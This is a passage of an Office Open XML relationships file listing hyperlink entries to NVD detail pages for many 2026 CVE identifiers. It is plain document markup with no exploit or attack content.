Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76412" TargetMode="External" Id="rId321" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79708" TargetMode="External" Id="rId322" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80436" TargetMode="External" Id="rId323" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81207" TargetMode="External" Id="rId324" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81540" TargetMode="External" Id="rId325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86359" TargetMode="External" Id="rId326" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87023" TargetMode="External" Id="rId327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87030" TargetMode="External" Id="rId328" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90553" TargetMode="External" Id="rId329" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92397" TargetMode="External" Id="rId330" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92398" TargetMode="External" Id="rId331" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20334" TargetMode="External" Id="rId332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-40857" TargetMode="External" Id="rId333" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-4130" TargetMode="External" Id="rId334" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68955" TargetMode="External" Id="rId335" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76825" TargetMode="External" Id="rId336" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82049" TargetMode="External" Id="rId337" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82717" TargetMode="External" Id="rId338" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84546" TargetMode="External" Id="rId339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84580" TargetMode="External" Id="rId340" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84581" TargetMode="External" Id="rId341" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84584" TargetMode="External" Id="rId342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85616" TargetMode="External" Id="rId343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86836" TargetMode="External" Id="rId344" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89781" TargetMode="External" Id="rId345" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89782" TargetMode="External" Id="rId346" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89795" TargetMode="External" Id="rId347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89806" TargetMode="External" Id="rId348" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89856" TargetMode="External" Id="rId349" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89877" TargetMode="External" Id="rId350" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89885" TargetMode="External" Id="rId351" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89904" TargetMode="External" Id="rId352" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89943" TargetMode="External" Id="rId353" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89980" TargetMode="External" Id="rId354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89992" TargetMode="External" Id="rId355" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90895" TargetMode="External" Id="rId356" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91102" TargetMode="External" Id="rId357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20323" TargetMode="External" Id="rId358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69646" TargetMode="External" Id="rId359" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86771" TargetMode="External" Id="rId360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87034" TargetMode="External" Id="rId361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88033" TargetMode="External" Id="rId362" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92467" TargetMode="External" Id="rId363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92752" TargetMode="External" Id="rId364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17467" TargetMode="External" Id="rId365" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57132" TargetMode="External" Id="rId366" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63127" TargetMode="External" Id="rId367" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65838" TargetMode="External" Id="rId368" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71180" TargetMode="External" Id="rId369" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76413" TargetMode="External" Id="rId370" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77406" TargetMode="External" Id="rId371" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77409" TargetMode="External" Id="rId372" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78252" TargetMode="External" Id="rId373" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82786" TargetMode="External" Id="rId374" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84535" TargetMode="External" Id="rId375" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84577" TargetMode="External" Id="rId376" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85921" TargetMode="External" Id="rId377" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86107" TargetMode="External" Id="rId378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89973" TargetMode="External" Id="rId379" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92729" TargetMode="External" Id="rId380" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-43936" TargetMode="External" Id="rId381" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16335" TargetMode="External" Id="rId382" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20335" TargetMode="External" Id="rId383" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27552" TargetMode="External" Id="rId384" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54178" TargetMode="External" Id="rId385" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61591" TargetMode="External" Id="rId386" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61593" TargetMode="External" Id="rId387" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63671" TargetMode="External" Id="rId388" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65415" TargetMode="External" Id="rId389" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69813" TargetMode="External" Id="rId390" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69858" TargetMode="External" Id="rId391" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69989" TargetMode="External" Id="rId392" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70342" TargetMode="External" Id="rId393" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70563" TargetMode="External" Id="rId394" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74909" TargetMode="External" Id="rId395" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78450" TargetMode="External" Id="rId396" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81268" TargetMode="External" Id="rId397" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81551" TargetMode="External" Id="rId398" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82066" TargetMode="External" Id="rId399" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82291" TargetMode="External" Id="rId400" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84516" TargetMode="External" Id="rId401" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87036" TargetMode="External" Id="rId402" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87075" TargetMode="External" Id="rId403" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89848" TargetMode="External" Id="rId404" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89861" TargetMode="External" Id="rId405" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89999" TargetMode="External" Id="rId406" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92087" TargetMode="External" Id="rId407" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92578" TargetMode="External" Id="rId408" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92604" TargetMode="External" Id="rId409" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92749" TargetMode="External" Id="rId410" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92751" TargetMode="External" Id="rId411" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92763" TargetMode="External" Id="rId412" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92776" TargetMode="External" Id="rId413" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92782" TargetMode="External" Id="rId414" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92783" TargetMode="External" Id="rId415" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92785" TargetMode="External" Id="rId416" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92793" TargetMode="External" Id="rId417" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92806" TargetMode="External" Id="rId418" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69423" TargetMode="External" Id="rId419" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69503" TargetMode="External" Id="rId420" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85469" TargetMode="External" Id="rId421" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89947" TargetMode="External" Id="rId422" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89954" TargetMode="External" Id="rId423" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92127" TargetMode="External" Id="rId424" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92134" TargetMode="External" Id="rId425" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92135" TargetMode="External" Id="rId426" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92136" TargetMode="External" Id="rId427" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89911" TargetMode="External" Id="rId428" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17133" TargetMode="External" Id="rId429" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17156" TargetMode="External" Id="rId430" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17416" TargetMode="External" Id="rId431" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-23789" TargetMode="External" Id="rId432" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-43684" TargetMode="External" Id="rId433" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-43688" TargetMode="External" Id="rId434" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-43702" TargetMode="External" Id="rId435" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59974" TargetMode="External" Id="rId436" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63325" TargetMode="External" Id="rId437" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64790" TargetMode="External" Id="rId438" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65344" TargetMode="External" Id="rId439" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69270" TargetMode="External" Id="rId440" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69295" TargetMode="External" Id="rId441" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69307" TargetMode="External" Id="rId442" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69571" TargetMode="External" Id="rId443" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69584" TargetMode="External" Id="rId444" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69687" TargetMode="External" Id="rId445" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69707" TargetMode="External" Id="rId446" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69822" TargetMode="External" Id="rId447" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69841" TargetMode="External" Id="rId448" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69844" TargetMode="External" Id="rId449" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69864" TargetMode="External" Id="rId450" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69900" TargetMode="External" Id="rId451" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69907" TargetMode="External" Id="rId452" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69921" TargetMode="External" Id="rId453" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70564" TargetMode="External" Id="rId454" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70569" TargetMode="External" Id="rId455" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71334" TargetMode="External" Id="rId456" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77500" TargetMode="External" Id="rId457" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80166" TargetMode="External" Id="rId458" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84497" TargetMode="External" Id="rId459" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84505" TargetMode="External" Id="rId460" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84506" TargetMode="External" Id="rId461" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84511" TargetMode="External" Id="rId462" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84515" TargetMode="External" Id="rId463" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84575" TargetMode="External" Id="rId464" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84607" TargetMode="External" Id="rId465" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85892" TargetMode="External" Id="rId466" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88051" TargetMode="External" Id="rId467" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88052" TargetMode="External" Id="rId468" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88053" TargetMode="External" Id="rId469" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89161" TargetMode="External" Id="rId470" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89789" TargetMode="External" Id="rId471" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89791" TargetMode="External" Id="rId472" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89793" TargetMode="External" Id="rId473" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89799" TargetMode="External" Id="rId474" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89801" TargetMode="External" Id="rId475" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89803" TargetMode="External" Id="rId476" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89805" TargetMode="External" Id="rId477" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89808" TargetMode="External" Id="rId478" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89810" TargetMode="External" Id="rId479" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89814" TargetMode="External" Id="rId480" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89815" TargetMode="External" Id="rId481" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89819" TargetMode="External" Id="rId482" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89823" TargetMode="External" Id="rId483" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89825" TargetMode="External" Id="rId484" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89829" TargetMode="External" Id="rId485" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89832" TargetMode="External" Id="rId486" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 